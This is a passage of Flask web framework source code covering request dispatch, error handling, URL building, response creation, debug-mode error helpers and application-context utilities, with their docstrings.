application in debug mode, but disable the code execution on the interactive debugger, you can pass ``use_evalex=False`` as parameter. 
This will keep the debugger's traceback screen active, but disable code execution. It is not recommended to use this function for development with automatic reloading as this is badly supported. Instead you should be using the :command:`flask` command line script's ``run`` support. .. admonition:: Keep in Mind Flask will suppress any server error with a generic error page unless it is in debug mode. As such to enable just the interactive debugger without the code reloading, you have to invoke :meth:`run` with ``debug=True`` and ``use_reloader=False``. Setting ``use_debugger`` to ``True`` without being in debug mode won't catch any exceptions because there won't be any to catch. :param host: the hostname to listen on. Set this to ``'0.0.0.0'`` to have the server available externally as well. Defaults to ``'127.0.0.1'`` or the host in the ``SERVER_NAME`` config variable if present. :param port: the port of the webserver. Defaults to ``5000`` or the port defined in the ``SERVER_NAME`` config variable if present. :param debug: if given, enable or disable debug mode. See :attr:`debug`. :param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv` files to set environment variables. Will also change the working directory to the directory containing the first file found. :param options: the options to be forwarded to the underlying Werkzeug server. See :func:`werkzeug.serving.run_simple` for more information. .. versionchanged:: 1.0 If installed, python-dotenv will be used to load environment variables from :file:`.env` and :file:`.flaskenv` files. The :envvar:`FLASK_DEBUG` environment variable will override :attr:`debug`. Threaded mode is enabled by default. .. versionchanged:: 0.10 The default port is now picked from the ``SERVER_NAME`` variable. """ # Ignore this call so that it doesn't start another server if # the 'flask run' command is used. if os.environ.get("FLASK_RUN_FROM_CLI") == "true": if not is_running_from_reloader(): click.secho( " * Ignoring a call to 'app.run()' that would block" " the current 'flask' CLI command.\n" " Only call 'app.run()' in an 'if __name__ ==" ' "__main__"\' guard.', fg="red", ) return if get_load_dotenv(load_dotenv): cli.load_dotenv() # if set, env var overrides existing value if "FLASK_DEBUG" in os.environ: self.debug = get_debug_flag() # debug passed to method overrides all other sources if debug is not None: self.debug = bool(debug) server_name = self.config.get("SERVER_NAME") sn_host = sn_port = None if server_name: sn_host, _, sn_port = server_name.partition(":") if not host: if sn_host: host = sn_host else: host = "127.0.0.1" if port or port == 0: port = int(port) elif sn_port: port = int(sn_port) else: port = 5000 options.setdefault("use_reloader", self.debug) options.setdefault("use_debugger", self.debug) options.setdefault("threaded", True) cli.show_server_banner(self.debug, self.name) from werkzeug.serving import run_simple try: run_simple(t.cast(str, host), port, self, **options) finally: # reset the first request information if the development server # reset normally. This makes it possible to restart the server # without reloader and that stuff from an interactive shell. self._got_first_request = False def test_client(self, use_cookies: bool = True, **kwargs: t.Any) -> FlaskClient: """Creates a test client for this application. For information about unit testing head over to :doc:`/testing`. 
Note that if you are testing for assertions or exceptions in your application code, you must set ``app.testing = True`` in order for the exceptions to propagate to the test client. Otherwise, the exception will be handled by the application (not visible to the test client) and the only indication of an AssertionError or other exception will be a 500 status code response to the test client. See the :attr:`testing` attribute. For example:: app.testing = True client = app.test_client() The test client can be used in a ``with`` block to defer the closing down of the context until the end of the ``with`` block. This is useful if you want to access the context locals for testing:: with app.test_client() as c: rv = c.get('/?vodka=42') assert request.args['vodka'] == '42' Additionally, you may pass optional keyword arguments that will then be passed to the application's :attr:`test_client_class` constructor. For example:: from flask.testing import FlaskClient class CustomClient(FlaskClient): def __init__(self, *args, **kwargs): self._authentication = kwargs.pop("authentication") super(CustomClient,self).__init__( *args, **kwargs) app.test_client_class = CustomClient client = app.test_client(authentication='Basic ....') See :class:`~flask.testing.FlaskClient` for more information. .. versionchanged:: 0.4 added support for ``with`` block usage for the client. .. versionadded:: 0.7 The `use_cookies` parameter was added as well as the ability to override the client to be used by setting the :attr:`test_client_class` attribute. .. versionchanged:: 0.11 Added `**kwargs` to support passing additional keyword arguments to the constructor of :attr:`test_client_class`. """ cls = self.test_client_class if cls is None: from .testing import FlaskClient as cls return cls( # type: ignore self, self.response_class, use_cookies=use_cookies, **kwargs ) def test_cli_runner(self, **kwargs: t.Any) -> FlaskCliRunner: """Create a CLI runner for testing CLI commands. See :ref:`testing-cli`. Returns an instance of :attr:`test_cli_runner_class`, by default :class:`~flask.testing.FlaskCliRunner`. The Flask app object is passed as the first argument. .. versionadded:: 1.0 """ cls = self.test_cli_runner_class if cls is None: from .testing import FlaskCliRunner as cls return cls(self, **kwargs) # type: ignore def handle_http_exception( self, e: HTTPException ) -> HTTPException | ft.ResponseReturnValue: """Handles an HTTP exception. By default this will invoke the registered error handlers and fall back to returning the exception as response. .. versionchanged:: 1.0.3 ``RoutingException``, used internally for actions such as slash redirects during routing, is not passed to error handlers. .. versionchanged:: 1.0 Exceptions are looked up by code *and* by MRO, so ``HTTPException`` subclasses can be handled with a catch-all handler for the base ``HTTPException``. .. versionadded:: 0.3 """ # Proxy exceptions don't have error codes. We want to always return # those unchanged as errors if e.code is None: return e # RoutingExceptions are used internally to trigger routing # actions, such as slash redirects raising RequestRedirect. They # are not raised or handled in user code. 
if isinstance(e, RoutingException): return e handler = self._find_error_handler(e, request.blueprints) if handler is None: return e return self.ensure_sync(handler)(e) # type: ignore[no-any-return] def handle_user_exception( self, e: Exception ) -> HTTPException | ft.ResponseReturnValue: """This method is called whenever an exception occurs that should be handled. A special case is :class:`~werkzeug .exceptions.HTTPException` which is forwarded to the :meth:`handle_http_exception` method. This function will either return a response value or reraise the exception with the same traceback. .. versionchanged:: 1.0 Key errors raised from request data like ``form`` show the bad key in debug mode rather than a generic bad request message. .. versionadded:: 0.7 """ if isinstance(e, BadRequestKeyError) and ( self.debug or self.config["TRAP_BAD_REQUEST_ERRORS"] ): e.show_exception = True if isinstance(e, HTTPException) and not self.trap_http_exception(e): return self.handle_http_exception(e) handler = self._find_error_handler(e, request.blueprints) if handler is None: raise return self.ensure_sync(handler)(e) # type: ignore[no-any-return] def handle_exception(self, e: Exception) -> Response: """Handle an exception that did not have an error handler associated with it, or that was raised from an error handler. This always causes a 500 ``InternalServerError``. Always sends the :data:`got_request_exception` signal. If :data:`PROPAGATE_EXCEPTIONS` is ``True``, such as in debug mode, the error will be re-raised so that the debugger can display it. Otherwise, the original exception is logged, and an :exc:`~werkzeug.exceptions.InternalServerError` is returned. If an error handler is registered for ``InternalServerError`` or ``500``, it will be used. For consistency, the handler will always receive the ``InternalServerError``. The original unhandled exception is available as ``e.original_exception``. .. versionchanged:: 1.1.0 Always passes the ``InternalServerError`` instance to the handler, setting ``original_exception`` to the unhandled error. .. versionchanged:: 1.1.0 ``after_request`` functions and other finalization is done even for the default 500 response when there is no handler. .. versionadded:: 0.3 """ exc_info = sys.exc_info() got_request_exception.send(self, _async_wrapper=self.ensure_sync, exception=e) propagate = self.config["PROPAGATE_EXCEPTIONS"] if propagate is None: propagate = self.testing or self.debug if propagate: # Re-raise if called with an active exception, otherwise # raise the passed in exception. if exc_info[1] is e: raise raise e self.log_exception(exc_info) server_error: InternalServerError | ft.ResponseReturnValue server_error = InternalServerError(original_exception=e) handler = self._find_error_handler(server_error, request.blueprints) if handler is not None: server_error = self.ensure_sync(handler)(server_error) return self.finalize_request(server_error, from_error_handler=True) def log_exception( self, exc_info: (tuple[type, BaseException, TracebackType] | tuple[None, None, None]), ) -> None: """Logs an exception. This is called by :meth:`handle_exception` if debugging is disabled and right before the handler is called. The default implementation logs the exception as error on the :attr:`logger`. .. versionadded:: 0.8 """ self.logger.error( f"Exception on {request.path} [{request.method}]", exc_info=exc_info ) def dispatch_request(self) -> ft.ResponseReturnValue: """Does the request dispatching. Matches the URL and returns the return value of the view or error handler. 
This does not have to be a response object. In order to convert the return value to a proper response object, call :func:`make_response`. .. versionchanged:: 0.7 This no longer does the exception handling, this code was moved to the new :meth:`full_dispatch_request`. """ req = request_ctx.request if req.routing_exception is not None: self.raise_routing_exception(req) rule: Rule = req.url_rule # type: ignore[assignment] # if we provide automatic options for this URL and the # request came with the OPTIONS method, reply automatically if ( getattr(rule, "provide_automatic_options", False) and req.method == "OPTIONS" ): return self.make_default_options_response() # otherwise dispatch to the handler for that endpoint view_args: dict[str, t.Any] = req.view_args # type: ignore[assignment] return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) # type: ignore[no-any-return] def full_dispatch_request(self) -> Response: """Dispatches the request and on top of that performs request pre and postprocessing as well as HTTP exception catching and error handling. .. versionadded:: 0.7 """ self._got_first_request = True try: request_started.send(self, _async_wrapper=self.ensure_sync) rv = self.preprocess_request() if rv is None: rv = self.dispatch_request() except Exception as e: rv = self.handle_user_exception(e) return self.finalize_request(rv) def finalize_request( self, rv: ft.ResponseReturnValue | HTTPException, from_error_handler: bool = False, ) -> Response: """Given the return value from a view function this finalizes the request by converting it into a response and invoking the postprocessing functions. This is invoked for both normal request dispatching as well as error handlers. Because this means that it might be called as a result of a failure a special safe mode is available which can be enabled with the `from_error_handler` flag. If enabled, failures in response processing will be logged and otherwise ignored. :internal: """ response = self.make_response(rv) try: response = self.process_response(response) request_finished.send( self, _async_wrapper=self.ensure_sync, response=response ) except Exception: if not from_error_handler: raise self.logger.exception( "Request finalizing failed with an error while handling an error" ) return response def make_default_options_response(self) -> Response: """This method is called to create the default ``OPTIONS`` response. This can be changed through subclassing to change the default behavior of ``OPTIONS`` responses. .. versionadded:: 0.7 """ adapter = request_ctx.url_adapter methods = adapter.allowed_methods() # type: ignore[union-attr] rv = self.response_class() rv.allow.update(methods) return rv def ensure_sync(self, func: t.Callable[..., t.Any]) -> t.Callable[..., t.Any]: """Ensure that the function is synchronous for WSGI workers. Plain ``def`` functions are returned as-is. ``async def`` functions are wrapped to run and wait for the response. Override this method to change how the app runs async views. .. versionadded:: 2.0 """ if iscoroutinefunction(func): return self.async_to_sync(func) return func def async_to_sync( self, func: t.Callable[..., t.Coroutine[t.Any, t.Any, t.Any]] ) -> t.Callable[..., t.Any]: """Return a sync function that will run the coroutine function. .. code-block:: python result = app.async_to_sync(func)(*args, **kwargs) Override this method to change how the app converts async code to be synchronously callable. .. 
versionadded:: 2.0 """ try: from asgiref.sync import async_to_sync as asgiref_async_to_sync except ImportError: raise RuntimeError( "Install Flask with the 'async' extra in order to use async views." ) from None return asgiref_async_to_sync(func) def url_for( self, /, endpoint: str, *, _anchor: str | None = None, _method: str | None = None, _scheme: str | None = None, _external: bool | None = None, **values: t.Any, ) -> str: """Generate a URL to the given endpoint with the given values. This is called by :func:`flask.url_for`, and can be called directly as well. An *endpoint* is the name of a URL rule, usually added with :meth:`@app.route() <route>`, and usually the same name as the view function. A route defined in a :class:`~flask.Blueprint` will prepend the blueprint's name separated by a ``.`` to the endpoint. In some cases, such as email messages, you want URLs to include the scheme and domain, like ``https://example.com/hello``. When not in an active request, URLs will be external by default, but this requires setting :data:`SERVER_NAME` so Flask knows what domain to use. :data:`APPLICATION_ROOT` and :data:`PREFERRED_URL_SCHEME` should also be configured as needed. This config is only used when not in an active request. Functions can be decorated with :meth:`url_defaults` to modify keyword arguments before the URL is built. If building fails for some reason, such as an unknown endpoint or incorrect values, the app's :meth:`handle_url_build_error` method is called. If that returns a string, that is returned, otherwise a :exc:`~werkzeug.routing.BuildError` is raised. :param endpoint: The endpoint name associated with the URL to generate. If this starts with a ``.``, the current blueprint name (if any) will be used. :param _anchor: If given, append this as ``#anchor`` to the URL. :param _method: If given, generate the URL associated with this method for the endpoint. :param _scheme: If given, the URL will have this scheme if it is external. :param _external: If given, prefer the URL to be internal (False) or require it to be external (True). External URLs include the scheme and domain. When not in an active request, URLs are external by default. :param values: Values to use for the variable parts of the URL rule. Unknown keys are appended as query string arguments, like ``?a=b&c=d``. .. versionadded:: 2.2 Moved from ``flask.url_for``, which calls this method. """ req_ctx = _cv_request.get(None) if req_ctx is not None: url_adapter = req_ctx.url_adapter blueprint_name = req_ctx.request.blueprint # If the endpoint starts with "." and the request matches a # blueprint, the endpoint is relative to the blueprint. if endpoint[:1] == ".": if blueprint_name is not None: endpoint = f"{blueprint_name}{endpoint}" else: endpoint = endpoint[1:] # When in a request, generate a URL without scheme and # domain by default, unless a scheme is given. if _external is None: _external = _scheme is not None else: app_ctx = _cv_app.get(None) # If called by helpers.url_for, an app context is active, # use its url_adapter. Otherwise, app.url_for was called # directly, build an adapter. if app_ctx is not None: url_adapter = app_ctx.url_adapter else: url_adapter = self.create_url_adapter(None) if url_adapter is None: raise RuntimeError( "Unable to build URLs outside an active request" " without 'SERVER_NAME' configured. Also configure" " 'APPLICATION_ROOT' and 'PREFERRED_URL_SCHEME' as" " needed." ) # When outside a request, generate a URL with scheme and # domain by default. 
if _external is None: _external = True # It is an error to set _scheme when _external=False, in order # to avoid accidental insecure URLs. if _scheme is not None and not _external: raise ValueError("When specifying '_scheme', '_external' must be True.") self.inject_url_defaults(endpoint, values) try: rv = url_adapter.build( # type: ignore[union-attr] endpoint, values, method=_method, url_scheme=_scheme, force_external=_external, ) except BuildError as error: values.update( _anchor=_anchor, _method=_method, _scheme=_scheme, _external=_external ) return self.handle_url_build_error(error, endpoint, values) if _anchor is not None: _anchor = _url_quote(_anchor, safe="%!#$&'()*+,/:;=?@") rv = f"{rv}#{_anchor}" return rv def make_response(self, rv: ft.ResponseReturnValue) -> Response: """Convert the return value from a view function to an instance of :attr:`response_class`. :param rv: the return value from the view function. The view function must return a response. Returning ``None``, or the view ending without returning, is not allowed. The following types are allowed for ``view_rv``: ``str`` A response object is created with the string encoded to UTF-8 as the body. ``bytes`` A response object is created with the bytes as the body. ``dict`` A dictionary that will be jsonify'd before being returned. ``list`` A list that will be jsonify'd before being returned. ``generator`` or ``iterator`` A generator that returns ``str`` or ``bytes`` to be streamed as the response. ``tuple`` Either ``(body, status, headers)``, ``(body, status)``, or ``(body, headers)``, where ``body`` is any of the other types allowed here, ``status`` is a string or an integer, and ``headers`` is a dictionary or a list of ``(key, value)`` tuples. If ``body`` is a :attr:`response_class` instance, ``status`` overwrites the exiting value and ``headers`` are extended. :attr:`response_class` The object is returned unchanged. other :class:`~werkzeug.wrappers.Response` class The object is coerced to :attr:`response_class`. :func:`callable` The function is called as a WSGI application. The result is used to create a response object. .. versionchanged:: 2.2 A generator will be converted to a streaming response. A list will be converted to a JSON response. .. versionchanged:: 1.1 A dict will be converted to a JSON response. .. versionchanged:: 0.9 Previously a tuple was interpreted as the arguments for the response object. """ status = headers = None # unpack tuple returns if isinstance(rv, tuple): len_rv = len(rv) # a 3-tuple is unpacked directly if len_rv == 3: rv, status, headers = rv # type: ignore[misc] # decide if a 2-tuple has status or headers elif len_rv == 2: if isinstance(rv[1], (Headers, dict, tuple, list)): rv, headers = rv else: rv, status = rv # type: ignore[assignment,misc] # other sized tuples are not allowed else: raise TypeError( "The view function did not return a valid response tuple." " The tuple must have the form (body, status, headers)," " (body, status), or (body, headers)." ) # the body must not be None if rv is None: raise TypeError( f"The view function for {request.endpoint!r} did not" " return a valid response. The function either returned" " None or ended without a return statement." 
) # make sure the body is an instance of the response class if not isinstance(rv, self.response_class): if isinstance(rv, (str, bytes, bytearray)) or isinstance(rv, cabc.Iterator): # let the response class set the status and headers instead of # waiting to do it manually, so that the class can handle any # special logic rv = self.response_class( rv, status=status, headers=headers, # type: ignore[arg-type] ) status = headers = None elif isinstance(rv, (dict, list)): rv = self.json.response(rv) elif isinstance(rv, BaseResponse) or callable(rv): # evaluate a WSGI callable, or coerce a different response # class to the correct type try: rv = self.response_class.force_type( rv, # type: ignore[arg-type] request.environ, ) except TypeError as e: raise TypeError( f"{e}\nThe view function did not return a valid" " response. The return type must be a string," " dict, list, tuple with headers or status," " Response instance, or WSGI callable, but it" f" was a {type(rv).__name__}." ).with_traceback(sys.exc_info()[2]) from None else: raise TypeError( "The view function did not return a valid" " response. The return type must be a string," " dict, list, tuple with headers or status," " Response instance, or WSGI callable, but it was a" f" {type(rv).__name__}." ) rv = t.cast(Response, rv) # prefer the status if it was provided if status is not None: if isinstance(status, (str, bytes, bytearray)): rv.status = status else: rv.status_code = status # extend existing headers with provided headers if headers: rv.headers.update(headers) # type: ignore[arg-type] return rv def preprocess_request(self) -> ft.ResponseReturnValue | None: """Called before the request is dispatched. Calls :attr:`url_value_preprocessors` registered with the app and the current blueprint (if any). Then calls :attr:`before_request_funcs` registered with the app and the blueprint. If any :meth:`before_request` handler returns a non-None value, the value is handled as if it was the return value from the view, and further request handling is stopped. """ names = (None, *reversed(request.blueprints)) for name in names: if name in self.url_value_preprocessors: for url_func in self.url_value_preprocessors[name]: url_func(request.endpoint, request.view_args) for name in names: if name in self.before_request_funcs: for before_func in self.before_request_funcs[name]: rv = self.ensure_sync(before_func)() if rv is not None: return rv # type: ignore[no-any-return] return None def process_response(self, response: Response) -> Response: """Can be overridden in order to modify the response object before it's sent to the WSGI server. By default this will call all the :meth:`after_request` decorated functions. .. versionchanged:: 0.5 As of Flask 0.5 the functions registered for after request execution are called in reverse order of registration. :param response: a :attr:`response_class` object. :return: a new response object or the same, has to be an instance of :attr:`response_class`. 
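
        A subclass could, for instance, attach an extra header to every
        outgoing response (the subclass and header names below are purely
        illustrative)::

            class MyFlask(Flask):
                def process_response(self, response):
                    # run the regular after-request processing first
                    response = super().process_response(response)
                    # then add a made-up header for demonstration
                    response.headers["X-Example"] = "yes"
                    return response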
""" ctx = request_ctx._get_current_object() # type: ignore[attr-defined] for func in ctx._after_request_functions: response = self.ensure_sync(func)(response) for name in chain(request.blueprints, (None,)): if name in self.after_request_funcs: for func in reversed(self.after_request_funcs[name]): response = self.ensure_sync(func)(response) if not self.session_interface.is_null_session(ctx.session): self.session_interface.save_session(self, ctx.session, response) return response def do_teardown_request( self, exc: BaseException | None = _sentinel, # type: ignore[assignment] ) -> None: """Called after the request is dispatched and the response is returned, right before the request context is popped. This calls all functions decorated with :meth:`teardown_request`, and :meth:`Blueprint.teardown_request` if a blueprint handled the request. Finally, the :data:`request_tearing_down` signal is sent. This is called by :meth:`RequestContext.pop() <flask.ctx.RequestContext.pop>`, which may be delayed during testing to maintain access to resources. :param exc: An unhandled exception raised while dispatching the request. Detected from the current exception information if not passed. Passed to each teardown function. .. versionchanged:: 0.9 Added the ``exc`` argument. """ if exc is _sentinel: exc = sys.exc_info()[1] for name in chain(request.blueprints, (None,)): if name in self.teardown_request_funcs: for func in reversed(self.teardown_request_funcs[name]): self.ensure_sync(func)(exc) request_tearing_down.send(self, _async_wrapper=self.ensure_sync, exc=exc) def do_teardown_appcontext( self, exc: BaseException | None = _sentinel, # type: ignore[assignment] ) -> None: """Called right before the application context is popped. When handling a request, the application context is popped after the request context. See :meth:`do_teardown_request`. This calls all functions decorated with :meth:`teardown_appcontext`. Then the :data:`appcontext_tearing_down` signal is sent. This is called by :meth:`AppContext.pop() <flask.ctx.AppContext.pop>`. .. versionadded:: 0.9 """ if exc is _sentinel: exc = sys.exc_info()[1] for func in reversed(self.teardown_appcontext_funcs): self.ensure_sync(func)(exc) appcontext_tearing_down.send(self, _async_wrapper=self.ensure_sync, exc=exc) def app_context(self) -> AppContext: """Create an :class:`~flask.ctx.AppContext`. Use as a ``with`` block to push the context, which will make :data:`current_app` point at this application. An application context is automatically pushed by :meth:`RequestContext.push() <flask.ctx.RequestContext.push>` when handling a request, and when running a CLI command. Use this to manually create a context outside of these situations. :: with app.app_context(): init_db() See :doc:`/appcontext`. .. versionadded:: 0.9 """ return AppContext(self) def request_context(self, environ: WSGIEnvironment) -> RequestContext: """Create a :class:`~flask.ctx.RequestContext` representing a WSGI environment. Use a ``with`` block to push the context, which will make :data:`request` point at this request. See :doc:`/reqcontext`. Typically you should not call this from your own code. A request context is automatically pushed by the :meth:`wsgi_app` when handling a request. Use :meth:`test_request_context` to create an environment and context instead of this method. 
:param environ: a WSGI environment """ return RequestContext(self, environ) def test_request_context(self, *args: t.Any, **kwargs: t.Any) -> RequestContext: """Create a :class:`~flask.ctx.RequestContext` for a WSGI environment created from the given values. This is mostly useful during testing, where you may want to run a function that uses request data without dispatching a full request. See :doc:`/reqcontext`. Use a ``with`` block to push the context, which will make :data:`request` point at the request for the created environment. :: with app.test_request_context(...): generate_report() When using the shell, it may be easier to push and pop the context manually to avoid indentation. :: ctx = app.test_request_context(...) ctx.push() ... ctx.pop() Takes the same arguments as Werkzeug's :class:`~werkzeug.test.EnvironBuilder`, with some defaults from the application. See the linked Werkzeug docs for most of the available arguments. Flask-specific behavior is listed here. :param path: URL path being requested. :param base_url: Base URL where the app is being served, which ``path`` is relative to. If not given, built from :data:`PREFERRED_URL_SCHEME`, ``subdomain``, :data:`SERVER_NAME`, and :data:`APPLICATION_ROOT`. :param subdomain: Subdomain name to append to :data:`SERVER_NAME`. :param url_scheme: Scheme to use instead of :data:`PREFERRED_URL_SCHEME`. :param data: The request body, either as a string or a dict of form keys and values. :param json: If given, this is serialized as JSON and passed as ``data``. Also defaults ``content_type`` to ``application/json``. :param args: other positional arguments passed to :class:`~werkzeug.test.EnvironBuilder`. :param kwargs: other keyword arguments passed to :class:`~werkzeug.test.EnvironBuilder`. """ from .testing import EnvironBuilder builder = EnvironBuilder(self, *args, **kwargs) try: return self.request_context(builder.get_environ()) finally: builder.close() def wsgi_app( self, environ: WSGIEnvironment, start_response: StartResponse ) -> cabc.Iterable[bytes]: """The actual WSGI application. This is not implemented in :meth:`__call__` so that middlewares can be applied without losing a reference to the app object. Instead of doing this:: app = MyMiddleware(app) It's a better idea to do this instead:: app.wsgi_app = MyMiddleware(app.wsgi_app) Then you still have the original application object around and can continue to call methods on it. .. versionchanged:: 0.7 Teardown events for the request and app contexts are called even if an unhandled error occurs. Other events may not be called depending on when an error occurs during dispatch. See :ref:`callbacks-and-errors`. :param environ: A WSGI environment. :param start_response: A callable accepting a status code, a list of headers, and an optional exception context to start the response. 
""" ctx = self.request_context(environ) error: BaseException | None = None try: try: ctx.push() response = self.full_dispatch_request() except Exception as e: error = e response = self.handle_exception(e) except: # noqa: B001 error = sys.exc_info()[1] raise return response(environ, start_response) finally: if "werkzeug.debug.preserve_context" in environ: environ["werkzeug.debug.preserve_context"](_cv_app.get()) environ["werkzeug.debug.preserve_context"](_cv_request.get()) if error is not None and self.should_ignore_error(error): error = None ctx.pop(error) def __call__( self, environ: WSGIEnvironment, start_response: StartResponse ) -> cabc.Iterable[bytes]: """The WSGI server calls the Flask application object as the WSGI application. This calls :meth:`wsgi_app`, which can be wrapped to apply middleware. """ return self.wsgi_app(environ, start_response) File: src/flask/debughelpers.py from __future__ import annotations import typing as t from jinja2.loaders import BaseLoader from werkzeug.routing import RequestRedirect from .blueprints import Blueprint from .globals import request_ctx from .sansio.app import App if t.TYPE_CHECKING: from .sansio.scaffold import Scaffold from .wrappers import Request class UnexpectedUnicodeError(AssertionError, UnicodeError): """Raised in places where we want some better error reporting for unexpected unicode or binary data. """ class DebugFilesKeyError(KeyError, AssertionError): """Raised from request.files during debugging. The idea is that it can provide a better error message than just a generic KeyError/BadRequest. """ def __init__(self, request: Request, key: str) -> None: form_matches = request.form.getlist(key) buf = [ f"You tried to access the file {key!r} in the request.files" " dictionary but it does not exist. The mimetype for the" f" request is {request.mimetype!r} instead of" " 'multipart/form-data' which means that no file contents" " were transmitted. To fix this error you should provide" ' enctype="multipart/form-data" in your form.' ] if form_matches: names = ", ".join(repr(x) for x in form_matches) buf.append( "\n\nThe browser instead transmitted some file names. " f"This was submitted: {names}" ) self.msg = "".join(buf) def __str__(self) -> str: return self.msg class FormDataRoutingRedirect(AssertionError): """This exception is raised in debug mode if a routing redirect would cause the browser to drop the method or body. This happens when method is not GET, HEAD or OPTIONS and the status code is not 307 or 308. """ def __init__(self, request: Request) -> None: exc = request.routing_exception assert isinstance(exc, RequestRedirect) buf = [ f"A request was sent to '{request.url}', but routing issued" f" a redirect to the canonical URL '{exc.new_url}'." ] if f"{request.base_url}/" == exc.new_url.partition("?")[0]: buf.append( " The URL was defined with a trailing slash. Flask" " will redirect to the URL with a trailing slash if it" " was accessed without one." ) buf.append( " Send requests to the canonical URL, or use 307 or 308 for" " routing redirects. Otherwise, browsers will drop form" " data.\n\n" "This exception is only raised in debug mode." ) super().__init__("".join(buf)) def attach_enctype_error_multidict(request: Request) -> None: """Patch ``request.files.__getitem__`` to raise a descriptive error about ``enctype=multipart/form-data``. :param request: The request to patch. 
:meta private: """ oldcls = request.files.__class__ class newcls(oldcls): # type: ignore[valid-type, misc] def __getitem__(self, key: str) -> t.Any: try: return super().__getitem__(key) except KeyError as e: if key not in request.form: raise raise DebugFilesKeyError(request, key).with_traceback( e.__traceback__ ) from None newcls.__name__ = oldcls.__name__ newcls.__module__ = oldcls.__module__ request.files.__class__ = newcls def _dump_loader_info(loader: BaseLoader) -> t.Iterator[str]: yield f"class: {type(loader).__module__}.{type(loader).__name__}" for key, value in sorted(loader.__dict__.items()): if key.startswith("_"): continue if isinstance(value, (tuple, list)): if not all(isinstance(x, str) for x in value): continue yield f"{key}:" for item in value: yield f" - {item}" continue elif not isinstance(value, (str, int, float, bool)): continue yield f"{key}: {value!r}" def explain_template_loading_attempts( app: App, template: str, attempts: list[ tuple[ BaseLoader, Scaffold, tuple[str, str | None, t.Callable[[], bool] | None] | None, ] ], ) -> None: """This should help developers understand what failed""" info = [f"Locating template {template!r}:"] total_found = 0 blueprint = None if request_ctx and request_ctx.request.blueprint is not None: blueprint = request_ctx.request.blueprint for idx, (loader, srcobj, triple) in enumerate(attempts): if isinstance(srcobj, App): src_info = f"application {srcobj.import_name!r}" elif isinstance(srcobj, Blueprint): src_info = f"blueprint {srcobj.name!r} ({srcobj.import_name})" else: src_info = repr(srcobj) info.append(f"{idx + 1:5}: trying loader of {src_info}") for line in _dump_loader_info(loader): info.append(f" {line}") if triple is None: detail = "no match" else: detail = f"found ({triple[1] or '<string>'!r})" total_found += 1 info.append(f" -> {detail}") seems_fishy = False if total_found == 0: info.append("Error: the template could not be found.") seems_fishy = True elif total_found > 1: info.append("Warning: multiple loaders returned a match for the template.") seems_fishy = True if blueprint is not None and seems_fishy: info.append( " The template was looked up from an endpoint that belongs" f" to the blueprint {blueprint!r}." ) info.append(" Maybe you did not place a template in the right folder?") info.append(" See https://flask.palletsprojects.com/blueprints/#templates") app.logger.info("\n".join(info)) File: src/flask/ctx.py from __future__ import annotations import contextvars import sys import typing as t from functools import update_wrapper from types import TracebackType from werkzeug.exceptions import HTTPException from . import typing as ft from .globals import _cv_app from .globals import _cv_request from .signals import appcontext_popped from .signals import appcontext_pushed if t.TYPE_CHECKING: # pragma: no cover from _typeshed.wsgi import WSGIEnvironment from .app import Flask from .sessions import SessionMixin from .wrappers import Request # a singleton sentinel value for parameter defaults _sentinel = object() class _AppCtxGlobals: """A plain object. Used as a namespace for storing data during an application context. Creating an app context automatically creates this object, which is made available as the :data:`g` proxy. .. describe:: 'key' in g Check whether an attribute is present. .. versionadded:: 0.10 .. describe:: iter(g) Return an iterator over the attribute names. .. versionadded:: 0.10 """ # Define attr methods to let mypy know this is a namespace object # that has arbitrary attributes. 
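    # Illustrative only (hypothetical attribute names): within an app
    # context, code typically treats the ``g`` proxy backed by this class
    # as a plain namespace, e.g.
    #
    #     g.db = connect_db()   # set an arbitrary attribute
    #     "db" in g             # -> True
    #     g.pop("db", None)     # remove it, with a default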
def __getattr__(self, name: str) -> t.Any: try: return self.__dict__[name] except KeyError: raise AttributeError(name) from None def __setattr__(self, name: str, value: t.Any) -> None: self.__dict__[name] = value def __delattr__(self, name: str) -> None: try: del self.__dict__[name] except KeyError: raise AttributeError(name) from None def get(self, name: str, default: t.Any | None = None) -> t.Any: """Get an attribute by name, or a default value. Like :meth:`dict.get`. :param name: Name of attribute to get. :param default: Value to return if the attribute is not present. .. versionadded:: 0.10 """ return self.__dict__.get(name, default) def pop(self, name: str, default: t.Any = _sentinel) -> t.Any: """Get and remove an attribute by name. Like :meth:`dict.pop`. :param name: Name of attribute to pop. :param default: Value to return if the attribute is not present, instead of raising a ``KeyError``. .. versionadded:: 0.11 """ if default is _sentinel: return self.__dict__.pop(name) else: return self.__dict__.pop(name, default) def setdefault(self, name: str, default: t.Any = None) -> t.Any: """Get the value of an attribute if it is present, otherwise set and return a default value. Like :meth:`dict.setdefault`. :param name: Name of attribute to get. :param default: Value to set and return if the attribute is not present. .. versionadded:: 0.11 """ return self.__dict__.setdefault(name, default) def __contains__(self, item: str) -> bool: return item in self.__dict__ def __iter__(self) -> t.Iterator[str]: return iter(self.__dict__) def __repr__(self) -> str: ctx = _cv_app.get(None) if ctx is not None: return f"<flask.g of '{ctx.app.name}'>" return object.__repr__(self) def after_this_request( f: ft.AfterRequestCallable[t.Any], ) -> ft.AfterRequestCallable[t.Any]: """Executes a function after this request. This is useful to modify response objects. The function is passed the response object and has to return the same or a new one. Example:: @app.route('/') def index(): @after_this_request def add_header(response): response.headers['X-Foo'] = 'Parachute' return response return 'Hello World!' This is more useful if a function other than the view function wants to modify a response. For instance think of a decorator that wants to add some headers without converting the return value into a response object. .. versionadded:: 0.9 """ ctx = _cv_request.get(None) if ctx is None: raise RuntimeError( "'after_this_request' can only be used when a request" " context is active, such as in a view function." ) ctx._after_request_functions.append(f) return f F = t.TypeVar("F", bound=t.Callable[..., t.Any]) def copy_current_request_context(f: F) -> F: """A helper function that decorates a function to retain the current request context. This is useful when working with greenlets. The moment the function is decorated a copy of the request context is created and then pushed when the function is called. The current session is also included in the copied request context. Example:: import gevent from flask import copy_current_request_context @app.route('/') def index(): @copy_current_request_context def do_some_work(): # do some work here, it can access flask.request or # flask.session like you would otherwise in the view function. ... gevent.spawn(do_some_work) return 'Regular response' .. versionadded:: 0.10 """ ctx = _cv_request.get(None) if ctx is None: raise RuntimeError( "'copy_current_request_context' can only be used when a" " request context is active, such as in a view function." 
